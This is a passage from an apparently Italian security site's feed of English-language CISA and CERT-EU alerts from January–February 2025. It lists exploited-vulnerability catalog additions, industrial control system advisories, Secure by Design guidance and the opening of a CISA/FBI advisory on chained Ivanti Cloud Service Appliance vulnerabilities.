Sicurezza – Alert CERT ENG

Alert da Computer Emergency Response Team internazionali (CERT-EU, US-CERT)

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 13 Febbraio 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.     CVE-2024-57727 SimpleHelp Path Traversal Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Twenty Industrial Control Systems Advisories
    by CISA (Alerts) on 13 Febbraio 2025 at 12:00 pm

    CISA released twenty Industrial Control Systems (ICS) advisories on February 13, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-044-01 Siemens SIMATIC S7-1200 CPU Family ICSA-25-044-02 Siemens SIMATIC ICSA-25-044-03 Siemens SIPROTEC 5 ICSA-25-044-04 Siemens SIPROTEC 5 ICSA-25-044-05 Siemens SIPROTEC 5 Devices ICSA-25-044-06 Siemens RUGGEDCOM APE1808 Devices ICSA-25-044-07 Siemens Teamcenter ICSA-25-044-08 Siemens OpenV2G ICSA-25-044-09 Siemens SCALANCE W700 ICSA-25-044-10 Siemens Questa and ModelSim ICSA-25-044-11 Siemens APOGEE PXC and TALON TC Series ICSA-25-044-12 Siemens SIMATIC IPC DiagBase and SIMATIC IPC DiagMonitor ICSA-25-044-13 Siemens SIMATIC PCS neo and TIA Administrator ICSA-25-044-14 Siemens Opcenter Intelligence ICSA-25-044-15 ORing IAP-420 ICSA-25-044-16 mySCADA myPRO Manager ICSA-25-044-17 Outback Power Mojave Inverter ICSA-25-044-18 Dingtian DT-R0 Series  ICSA-24-030-02 Mitsubishi Electric FA Engineering Software Products (Update C)  ICSMA-25-044-01 Qardio Heart Health IOS and Android Application and QardioARM A100 CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds Two Known Exploited Vulnerabilities to Catalog
    by CISA (Alerts) on 12 Febbraio 2025 at 12:00 pm

    CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2025-24200 Apple iOS and iPadOS Incorrect Authorization Vulnerability CVE-2024-41710 Mitel SIP Phones Argument Injection Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA and FBI Warn of Malicious Cyber Actors Using Buffer Overflow Vulnerabilities to Compromise Software
    by CISA (Alerts) on 12 Febbraio 2025 at 12:00 pm

    CISA and the Federal Bureau of Investigation (FBI) have released a Secure by Design Alert, Eliminating Buffer Overflow Vulnerabilities, as part of their cooperative Secure by Design Alert series—an ongoing series aimed at advancing industry-wide best practices to eliminate entire classes of vulnerabilities during the design and development phases of the product lifecycle. “Eliminating Buffer Overflow Vulnerabilities” describes proven techniques to prevent or mitigate buffer overflow vulnerabilities through secure by design principles and best practices. Buffer overflow vulnerabilities are a prevalent type of defect in memory-safe software design that can lead to system compromise. These vulnerabilities can lead to data corruption, sensitive data exposure, program crashes, and unauthorized code execution. Threat actors frequently exploit these vulnerabilities to gain initial access to an organization’s network and then move laterally to the wider network. CISA and FBI urge manufacturers review the Alert and, where feasible, eliminate this class of defect by developing new software using memory-safe languages, using secure by design methods, and implementing the best practices supplied in this Alert. CISA and FBI also urge software customers demand secure products from manufacturers that include these preventions. Visit CISA’s Secure by Design Pledge page to learn about our voluntary pledge, which focuses on enterprise software products and services—including on-premises software, cloud services, and software as a service (SaaS).

  • CISA Adds Four Known Exploited Vulnerabilities to Catalog
    by CISA (Alerts) on 11 Febbraio 2025 at 12:00 pm

    CISA has added four vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-40891 Zyxel DSL CPE OS Command Injection Vulnerability CVE-2024-40890 Zyxel DSL CPE OS Command Injection Vulnerability CVE-2025-21418 Microsoft Windows Ancillary Function Driver for WinSock Heap-Based Buffer Overflow Vulnerability CVE-2025-21391 Microsoft Windows Storage Link Following Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Two Industrial Control Systems Advisories
    by CISA (Alerts) on 11 Febbraio 2025 at 12:00 pm

    CISA released two Industrial Control Systems (ICS) advisories on February 11, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-24-319-17 2N Access Commander (Update A) ICSA-25-037-04 Trimble Cityworks (Update A) CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 7 Febbraio 2025 at 12:00 pm

    CISA has added one vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2025-0994 Trimble Cityworks Deserialization Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • Trimble Releases Security Updates to Address a Vulnerability in Cityworks Software
    by CISA (Alerts) on 7 Febbraio 2025 at 12:00 pm

    CISA is collaborating with private industry partners to respond to reports of exploitation of a vulnerability (CVE-2025-0994) discovered by Trimble impacting its Cityworks Server AMS (Asset Management System). Trimble has released security updates and an advisory addressing a recently discovered deserialization vulnerability enabling an external actor to potentially conduct remote code execution (RCE) against a customer’s Microsoft Internet Information Services (IIS) web server.  CISA has added CVE-2025-0994 to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.  CISA strongly encourages users and administrators to search for indicators of compromise (IOCs) and apply the necessary updates and workarounds.  Review the following article for more information:  Trimble Advisory and IOCs for Vulnerability Affecting Cityworks Deployments  The Symantec Threat Hunter team, part of Broadcom, contributed to this guidance. 

  • CISA Adds Five Known Exploited Vulnerabilities to Catalog
    by CISA (Alerts) on 6 Febbraio 2025 at 12:00 pm

    CISA has added five vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2025-0411 7-Zip Mark of the Web Bypass Vulnerability CVE-2022-23748 Dante Discovery Process Control Vulnerability CVE-2024-21413 Microsoft Outlook Improper Input Validation Vulnerability CVE-2020-29574 CyberoamOS (CROS) SQL Injection Vulnerability CVE-2020-15069 Sophos XG Firewall Buffer Overflow Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Six Industrial Control Systems Advisories
    by CISA (Alerts) on 6 Febbraio 2025 at 12:00 pm

    CISA released six Industrial Control Systems (ICS) advisories on February 6, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-037-01 Schneider Electric EcoStruxure Power Monitoring Expert (PME) ICSA-25-037-02 Schneider Electric EcoStruxure ICSA-25-037-03 ABB Drive Composer ICSA-25-037-04 Trimble Cityworks ICSMA-25-037-01 MicroDicom DICOM Viewer ICSMA-25-037-02 Orthanc Server CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 5 Febbraio 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-53104 Linux Kernel Out-of-Bounds Write Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Nine Industrial Control Systems Advisories
    by CISA (Alerts) on 4 Febbraio 2025 at 12:00 pm

    CISA released nine Industrial Control Systems (ICS) advisories on February 4, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-035-01 Western Telematic Inc NPS Series, DSM Series, CPM Series ICSA-25-035-02 Rockwell Automation 1756-L8zS3 and 1756-L3zS3 ICSA-25-035-03 Elber Communications Equipment ICSA-25-035-04 Schneider Electric Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC ICSA-25-035-05 Schneider Electric Web Designer for Modicon ICSA-25-035-06 Schneider Electric Modicon M340 and BMXNOE0100/0110, BMXNOR0200H ICSA-25-035-07 Schneider Electric Pro-face GP-Pro EX and Remote HMI ICSA-25-035-08 AutomationDirect C-more EA9 HMI ICSA-23-299-03 Ashlar-Vellum Cobalt, Graphite, Xenon, Argon, Lithium (Update A) CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds Four Known Exploited Vulnerabilities to Catalog
    by CISA (Alerts) on 4 Febbraio 2025 at 12:00 pm

    CISA has added four new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-45195 Apache OFBiz Forced Browsing Vulnerability CVE-2024-29059 Microsoft .NET Framework Information Disclosure Vulnerability CVE-2018-9276 Paessler PRTG Network Monitor OS Command Injection Vulnerability CVE-2018-19410 Paessler PRTG Network Monitor Local File Inclusion Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Partners with ASD’s ACSC, CCCS, NCSC-UK, and Other International and US Organizations to Release Guidance on Edge Devices
    by CISA (Alerts) on 4 Febbraio 2025 at 12:00 pm

    CISA—in partnership with international and U.S. organizations—released guidance to help organizations protect their network edge devices and appliances, such as firewalls, routers, virtual private networks (VPN) gateways, Internet of Things (IoT) devices, internet-facing servers, and internet-facing operational technology (OT) systems. The published guidance is as follows: “Security Considerations for Edge Devices,” led by the Canadian Centre for Cyber Security (CCCS), a part of the Communications Security Establishment Canada. “Digital Forensics Monitoring Specifications for Products of Network Devices and Applications,” led by the United Kingdom’s National Cyber Security Centre (NCSC-UK). “Mitigation Strategies for Edge Devices: Executive Guidance” and “Mitigation Strategies for Edge Devices: Practitioner Guidance,” two separate guides led by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC). Foreign adversaries routinely exploit software vulnerabilities in network edge devices to infiltrate critical infrastructure networks and systems. The damage can be expensive, time-consuming, and reputationally catastrophic for public and private sector organizations. These guidance documents detail various considerations and strategies for a more secure and resilient network both before and after a compromise. CISA and partner agencies urge device manufacturers and critical infrastructure owners and operators to review and implement the recommended actions and mitigations in the publications. Device manufacturers, please visit CISA’s Secure by Design page for more information on how to align development processes with the goal of reducing the prevalence of vulnerabilities in devices. Critical infrastructure owners and operators, please see Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products for guidance on procuring secure products.

  • CISA Releases Eight Industrial Control Systems Advisories
    by CISA (Alerts) on 30 Gennaio 2025 at 12:00 pm

    CISA released eight Industrial Control Systems (ICS) advisories on January 30, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-030-01 Hitachi Energy UNEM ICSA-25-030-02 New Rock Technologies Cloud Connected Devices ICSA-25-030-03 Schneider Electric System Monitor Application in Harmony and Pro-face PS5000 Legacy Industrial PCs ICSA-25-030-04 Rockwell Automation KEPServer ICSA-25-030-05 Rockwell Automation FactoryTalk AssetCentre  ICSMA-25-030-01 Contec Health CMS8000 Patient Monitor   ICSA-24-135-04 Mitsubishi Electric Multiple FA Engineering Software Products (Update B) ICSMA-22-244-01 Contec Health CMS8000 Patient Monitor (Update A) CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Releases Fact Sheet Detailing Embedded Backdoor Function of Contec CMS8000 Firmware
    by CISA (Alerts) on 30 Gennaio 2025 at 12:00 pm

    CISA released a fact sheet, Contec CMS8000 Contains a Backdoor, detailing an analysis of three firmware package versions of the Contec CMS8000, a patient monitor used by the U.S. Healthcare and Public Health (HPH) sector. Analysts discovered that an embedded backdoor function with a hard-coded IP address, CWE – 912: Hidden Functionality (CVE-2025-0626), and functionality that enables patient data spillage, CWE – 359: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2025-0683), exists in all versions analyzed. Please note the Contec CMS8000 may be re-labeled and sold by resellers. For a list of known re-labeled devices, please refer to FDA’s safety communication, Cybersecurity Vulnerabilities with Certain Patient Monitors from Contec and Epsimed: FDA Safety Communication. Contec Medical Systems, the company which manufactures this monitor as well as other medical device and healthcare solutions, is headquartered in Qinhuangdao, China. The Contec CMS8000 is used in medical settings across the U.S. and European Union to provide continuous monitoring of a patient’s vital signs—tracking electrocardiogram, heart rate, blood oxygen saturation, non-invasive blood pressure, temperature, and respiration rate. CISA assesses that inclusion of this backdoor in the firmware of the patient monitor can create conditions which may allow remote code execution and device modification with the ability to alter its configuration. This introduces risk to patient safety as a malfunctioning patient monitor could lead to an improper response to patient vital signs. CISA strongly urges HPH sector organizations review the fact sheet and implement FDA’s mitigations. Visit CISA’s Healthcare and Public Health Cybersecurity page to learn more about how to help improve cybersecurity within the HPH sector. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 29 Gennaio 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation, as confirmed by Fortinet. CVE-2025-24085 Apple Multiple Products Use-After-Free Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Seven Industrial Control Systems Advisories
    by CISA (Alerts) on 28 Gennaio 2025 at 12:00 pm

    CISA released seven Industrial Control Systems (ICS) advisories on January 28, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-028-01 B&R Automation Runtime ICSA-25-028-02 Schneider Electric Power Logic ICSA-25-028-03 Rockwell Automation FactoryTalk ICSA-25-028-04 Rockwell Automation FactoryTalk View Site Edition ICSA-25-028-05 Rockwell Automation DataMosaix Private Cloud ICSA-25-028-06 Schneider Electric RemoteConnect and SCADAPack x70 Utilities ICSMA-24-352-01 BD Diagnostic Solutions Products (Update A) CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • 2025-004: Critical Vulnerability in SonicWall Products
    by Latest publications of type Security Advisories on 28 Gennaio 2025 at 8:36 am

    On January 22, 2025, SonicWall issued an advisory regarding a critical vulnerability in the Appliance Management Console (AMC) and Central Management Console (CMC) of the SonicWall SMA 1000. An unauthenticated, remote attacker could exploit this vulnerability to execute arbitrary code on the affected appliance. This vulnerability is being exploited in the wild. It is recommended applying update as soon as possible.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 24 Gennaio 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2025-23006 SonicWall SMA1000 Appliances Deserialization Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 23 Gennaio 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2020-11023 JQuery Cross-Site Scripting (XSS) Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Six Industrial Control Systems Advisories
    by CISA (Alerts) on 23 Gennaio 2025 at 12:00 pm

    CISA released six Industrial Control Systems (ICS) advisories on January 23, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-023-01 mySCADA myPRO Manager ICSA-25-023-02 Hitachi Energy RTU500 Series Product ICSA-25-023-03 Schneider Electric EVlink Home Smart and Schneider Charge ICSA-25-023-04 Schneider Electric Easergy Studio ICSA-25-023-05 Schneider Electric EcoStruxure Power Build Rapsody ICSA-25-023-06 HMS Networks Ewon Flexy 202 CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA and FBI Release Advisory on How Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications
    by CISA (Alerts) on 22 Gennaio 2025 at 12:00 pm

    CISA, in partnership with the Federal Bureau of Investigation (FBI), released Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications. This advisory was crafted in response to exploitation of vulnerabilities—CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities—in Ivanti Cloud Service Appliances (CSA) in September 2024. CISA, and the use of trusted third-party incident response data, found that threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. CISA and FBI strongly encourage network administrators and defenders to upgrade to the latest supported version of Ivanti CSA and to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) provided in the advisory. All members of the cybersecurity community are also encouraged to visit CISA’s Known Exploited Vulnerabilities Catalog to help better manage vulnerabilities and keep pace with threat activity. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals.

  • CISA Releases Three Industrial Control Systems Advisories
    by CISA (Alerts) on 21 Gennaio 2025 at 12:00 pm

    CISA released three Industrial Control Systems (ICS) advisories on January 21, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-021-01 Traffic Alert and Collision Avoidance System (TCAS) II ICSA-25-021-02 Siemens SIMATIC S7-1200 CPUs ICSA-25-021-03 ZF Roll Stability Support Plus (RSSPlus) CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA and FBI Release Updated Guidance on Product Security Bad Practices
    by CISA (Alerts) on 17 Gennaio 2025 at 12:00 pm

    In partnership with the Federal Bureau of Investigation (FBI), CISA released an update to joint guidance Product Security Bad Practices in furtherance of CISA’s Secure by Design initiative. This updated guidance incorporates public comments CISA received in response to a Request for Information, adding additional bad practices, context regarding memory-safe languages, clarifying timelines for patching Known Exploited Vulnerabilities (KEVs), and other recommendations. While this voluntary guidance is intended for software manufacturers who develop software products and services in support of critical infrastructure, all software manufacturers are strongly encouraged to avoid these product security bad practices. CISA and FBI urge software manufacturers to reduce customer risk by prioritizing security throughout the product development process. For more information and resources, visit CISA’s Secure by Design webpage or learn how to take CISA’s Secure by Design Pledge.

  • CISA Releases Twelve Industrial Control Systems Advisories
    by CISA (Alerts) on 16 Gennaio 2025 at 12:00 pm

    CISA released twelve Industrial Control Systems (ICS) advisories on January 16, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-016-01 Siemens Mendix LDAP ICSA-25-016-02 Siemens Industrial Edge Management ICSA-25-016-03 Siemens Siveillance Video Camera ICSA-25-016-04 Siemens SIPROTEC 5 Products ICSA-25-016-05 Fuji Electric Alpha5 SMART ICSA-25-016-06 Hitachi Energy FOX61x, FOXCST, and FOXMAN-UN Products ICSA-25-016-07 Hitachi Energy FOX61x Products ICSA-25-016-08 Schneider Electric Data Center Expert  ICSA-24-058-01 Mitsubishi Electric Multiple Factory Automation Products (Update A) ICSA-25-010-03 Delta Electronics DRASimuCAD (Update A) ICSA-24-191-05 Johnson Controls Inc. Software House C●CURE 9000 (Update A) ICSA-24-030-02 Mitsubishi Electric FA Engineering Software Products (Update B) CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 16 Gennaio 2025 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-50603 Aviatrix Controllers OS Command Injection Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA and Partners Release Call to Action to Close the National Software Understanding Gap
    by CISA (Alerts) on 16 Gennaio 2025 at 12:00 pm

    Today, CISA—in partnership with the Defense Advanced Research Projects Agency (DARPA), the Office of the Under Secretary of Defense for Research and Engineering (OUSD R&E), and the National Security Agency (NSA)—published Closing the Software Understanding Gap. This report urgently implores the U.S. government to take decisive and coordinated action.  Software understanding refers to assessing software-controlled systems across all conditions. Mission owners and operators often lack adequate capabilities for software understanding because technology manufacturers build software that greatly outstrips the ability to understand it. This gap, along with the lack of secure by design software being created by technology manufacturers, can lead to the exploitation of software vulnerabilities.  The U.S. government has engaged in activities that have paved the way toward improving software understanding, including research investments, mission agency initiatives, and policy actions. This report further explores the opportunity for enhanced coordination to strengthen technical foundations and progress towards a more vigorous understanding of software on a national scale. To learn more about development practices and principles that build cybersecurity into the design and manufacture of technology products, visit CISA’s Secure by Design webpage.

  • Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications
    by CISA (CISA Cybersecurity Advisories) on 15 Gennaio 2025 at 5:26 pm

    Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways. Summary The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities. According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers. All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1] Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory. Download the PDF version of this report: AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications (PDF, 755.77 KB ) For a downloadable copy of IOCs, see: AA25-022A STIX XML (XML, 102.32 KB ) AA25-022A STIX JSON (JSON, 74.72 KB ) Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1] CVE-2024-8963 [CWE-22: Path Traversal] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victims’ network and execute arbitrary commands on the appliance [T1219].[2][3] CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary 